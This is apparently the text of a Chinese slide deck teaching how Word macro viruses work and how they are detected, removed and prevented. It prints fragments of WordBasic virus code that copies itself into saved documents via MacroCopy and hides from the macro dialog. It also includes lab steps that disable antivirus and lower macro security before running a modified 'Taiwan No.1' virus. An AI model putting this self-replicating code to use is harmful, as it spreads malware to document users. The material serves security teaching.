宏病毒技术专题知识宣讲课件.pptVIP

宏病毒技术专题知识宣讲;内容提纲;主要内容;宏病毒的基本原理;宏病毒定义;支持宏病毒的应用系统特点;可支持宏病毒的应用系统;宏病毒特点;宏病毒的共性;宏病毒的作用机制 ;Word宏病毒感染过程;宏病毒的基本原理;宏病毒的控制权获取;宏语言;5.3.2 宏病毒的基本原理;5.3.2 宏病毒的基本原理;使用VBA可以实现的功能;宏病毒关键技术;检查正常的宏 End If If MacroName$(i, 0, 0) = FileSaveAs Then bTooMuchTrouble = - 1 但如果FILESAVEAS 宏存在那么传染比较困难. End If Next i If Not bInstalled And Not bTooMuchTrouble Then;;2. SaveAs 程序： 这是一个当使用FILE-SAVE AS功能时，拷贝宏病毒到活动文本的程序。它使用了许多类似于AutoExec程序的技巧。尽管示例代码短小，但足以制作一个小巧的宏病毒。 Sub MAIN Dim dlg As FileSaveAs GetCurValues dlg Dialog dlg;If (Dlg.Format = 0) Or (dlg.Format = 1) Then MacroCopy FileSaveAs, WindowName$() + :FileSaveAs MacroCopy FileSave , WindowName$() + :FileSave MacroCopy PayLoad, WindowName$() + :PayLoad MacroCopy FileOpen, WindowName$() + :FileOpen Dlg.Format = 1 End If FileDaveAs dlg End Sub? ;3. 特殊代码： 还有些方法可以用来隐藏和使你的宏病毒更有趣。当有些人使用TOOLS/MICRO菜单观察宏时，该代码可以达到掩饰病毒的目的。 Sub MAIN On Error Goto ErrorRoutine OldName$ = NomFichier$() If macros.bDebug Then MsgBox start ToolsMacro Dim dlg As OutilsMacro If macros.bDebug Then MsgBox 1 GetCurValues dlg If macros.bDebug Then MsgBox 2 On Error Goto Skip Dialog dlg OutilsMacro dlg ;Skip: On Error Goto ErrorRoutine End If REM enable automacros DisableAutoMacros 0 macros.SaveToGlobal(OldName$) macros.objective Goto Done? ErrorRoutine: On Error Goto Done If macros.bDebug Then MsgBox error + Str$(Err) + occurred End If? Done: End Sub;宏病毒如何传染 ;宏病毒的自我隐藏 ;简单的宏病毒;Word宏病毒发现方法 ;Word宏病毒发现方法;宏病毒的防御;宏病毒的防御;手工清除宏病毒的方法? ;预防宏病毒;Word宏病毒实验;【实验步骤】 1. 软件设置：关闭杀毒软件的自动防护功能； 2. 打开Word 2003，在工具?宏?安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择??任visual basic项目的访问。;Word宏病毒实验;实验二：类台湾1号病毒 对实验一的恶意代码稍加修改，使其具有一定的破坏性（这里以著名宏病毒“台湾1号”的恶意代码部分为基础，为使其在word2003版本中运行，且降低破坏性，对源代码作适当修改）。参见源代码二macro_2.txt。;该病毒的效果如下： 1. 当打开被感染的word文档时，首先进行自我复制，感染word模板，然后检查日期，看是否是1日（即在每月的1日会发作）， 2. 然后跳出一个对话框，要求用户进行一次心算游戏，这里只用四个小于10的数相乘，如果用户的计算正确，那么就会新建一个文档，跳出如下字幕：“何谓宏病毒，答案：我就是......；如何预防宏病毒，答案：不要看我......”。如果计算错误，新建20个写有“宏病毒”字样的word文档，然后再一次进行心算游戏，总共进行3次，然后跳出程序。 3. 关闭文档的时候也会执行同样的询问。 ;清除宏病毒;思考题